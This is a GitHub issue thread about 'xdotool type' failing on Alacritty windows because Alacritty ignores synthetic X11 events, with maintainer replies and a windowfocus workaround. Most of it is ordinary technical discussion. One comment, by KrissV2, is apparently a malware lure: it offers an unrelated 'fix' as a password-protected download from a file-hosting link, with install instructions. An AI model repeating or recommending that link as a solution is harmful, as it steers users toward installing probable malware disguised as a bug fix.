### ISSUE TITLE
"xdotool type" command does not work on an alacritty window

### ISSUE THREAD

**Issue by rivten** [alacritty/alacritty#8154]
Hello there !

### System

OS: Linux
Version: alacritty 0.13.2 (bb8ea18e)
Linux/BSD: X11

### The bug

If I run `xdotool selectwindow` and pick an alacritty window (let's pay the id is `<ID>`).

Then if I run `xdotool type --window <ID> -- hello`, nothing happens in the alacritty window. I would expect the word "hello" to appear in the shell.

### What I think happens

Using the `xev` utility, I can see that `xdotool` is indeed working fine. With the same process, I can see some events in the `xev`-ed window.

```
KeyPress event, serial 28, synthetic YES, window 0x3400001,
    root 0x4353c000, subw 0x0, time 0, (1,1), root:(1,1),
    state 0x0, keycode 41 (keysym 0x65, e), same_screen YES,
    XLookupString gives 1 bytes: (65) "e"
    XmbLookupString gives 1 bytes: (65) "e"
    XFilterEvent returns: False
```

But here is a key I pressed on my own on this window : 

```
KeyPress event, serial 28, synthetic NO, window 0x3400001,
    root 0x41b, subw 0x0, time 14363417, (216,120), root:(1180,493),
    state 0x0, keycode 46 (keysym 0x72, r), same_screen YES,
    XLookupString gives 1 bytes: (72) "r"
    XmbLookupString gives 1 bytes: (72) "r"
    XFilterEvent returns: False
```

What I noticed immediatly was the `synthetic` parameter. I'm not sure what it means exactly, or why `xdotool` sends it.

But indeed, Alacritty ignores such events, as can be seen in `alacritty/src/events.rs` in the `skip_window_event` function.

### Why it matters to me

Well, in itself, `xdotool` is a pretty cool utility. My use case is using a vim plugins (https://github.com/jpalardy/vim-slime) that can send part of a file directly into a REPL. It does not work in Alacritty.

Is this normal that Alacritty ignores such event ?

Should it be `xdotool` that should send its parameter differently ?

Or should we change it altogether ?

Thanks a lot everybody for the awesome software,
And have a nice day !

**Comment by kchibisov** [comment]
I think there's an option to make xdotool not do so and it'll properly send everything iirc.

but synthetic input can not be accepted in the current state of things because how it's done upstream.

**Comment by nixpulvis** [comment]
I just gave this a shot on my X11 seat and it seems to be working for me. I can’t say I’ve used `xdotool` much, but perhaps it’s something with your setup?

**Comment by rivten** [comment]
Thanks for the time taken to answer here.

@kchibisov I'm looking at the xdotool source code and I cannot see such thing. All I see is in the file "xdo.c", I can see some `send_event = True` set. If I recompile myself with `False`, I still have the issue (I can see the synthetic event in `xev`).

Moreover, in `xdotool.pod` (a file in the repo): 

```
Sending keystrokes to a specific window uses a different API than simply typing
to the active window. If you specify 'xdotool type --window 12345 hello'
xdotool will generate key events and send them directly to window 12345.
However, X11 servers will set a special flag on all events generated in this
way (see XEvent.xany.send_event in X11's manual). Many programs observe this
flag and reject these events.

It is important to note that for key and mouse events, we only use
L<XSendEvent> when a specific window is targeted. Otherwise, we use L<XTEST>.

Some programs can be configured to accept events even if they are generated by
xdotool. Seek the documentation of your application for help.
```

Also, I had a quick look into the `winit` crate. I can understand why it could be hard to change the Alacritty code, because the `winit` crate seems to be adding its own synthetic events that are unrelated to my events, so it makes sense to ignore those one. Not sure what to do here…

@nixpulvis  that's pretty weird. I don't have a weird alacritty setup AFAIK (here is my setup : https://github.com/rivten/dotfiles/blob/master/alacritty/alacritty.toml) and looking at the code from Alacritty, xdotool and winit, I can't even understand how it could work in the first place. But thanks a ton for trying it for yourself, I'm really dumbfounded.

**Comment by rivten** [comment]
Oh ! @kchibisov I see you're working on Alacritty AND winit. Congrats on your involvement. 

I saw this issue : https://github.com/rust-windowing/winit/issues/3543 I guess my issue is somewhat linked to this one then.

**Comment by kchibisov** [comment]
>Also, I had a quick look into the winit crate. I can understand why it could be hard to change the Alacritty code, because the winit crate seems to be adding its own synthetic events that are unrelated to my events, so it makes sense to ignore those one. Not sure what to do here…

yeah, that's exactly an issue on why I can't change anything in alacritty because winit has synthetic events which _must be ignored_, so it's a bit _complicated_ as you can see.

Maybe in the future there will be a better separation of all of that, but for now it can not really work...

**Comment by kchibisov** [comment]
Wasn't there an option to make xdotool use `xkb` or something similar and route through it? IIRC it was somehow passing through and it was also working for me just fine...

**Comment by nixpulvis** [comment]
OK, this _is_ weird. Sometimes it works sometimes it doesn’t. I haven’t been able to figure out what makes it work and why sometimes it doesn’t yet. I’ll try to play with it some more.

**Comment by nixpulvis** [comment]
OK, I think I might see when things work. I thought I saw a cross window example work, but now it seems like the `xdotool type` is only working when called from the same window as the target window. Probably makes it less useful to you.

**Comment by rivten** [comment]
@nixpulvis I nailed it down a little bit. It's not necessarily the same window, but the window on which you wish to type has to be the active window.

So I can sort of do a workaround with something like this:

```
xdotool windowfocus <ID> && xdotool type --window <ID> mystuff
```

It works… altough now I see that my key mapping (French) is not preserved. But I can see that other apps such as firefox react the same, so probably not alacritty's fault there.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by chrisduerr** [comment]
Closing as not a priority. If Winit ever changes things and we can make this work, I don't mind. But if we never add support for synthetic input on X11, then that's fine by me too.
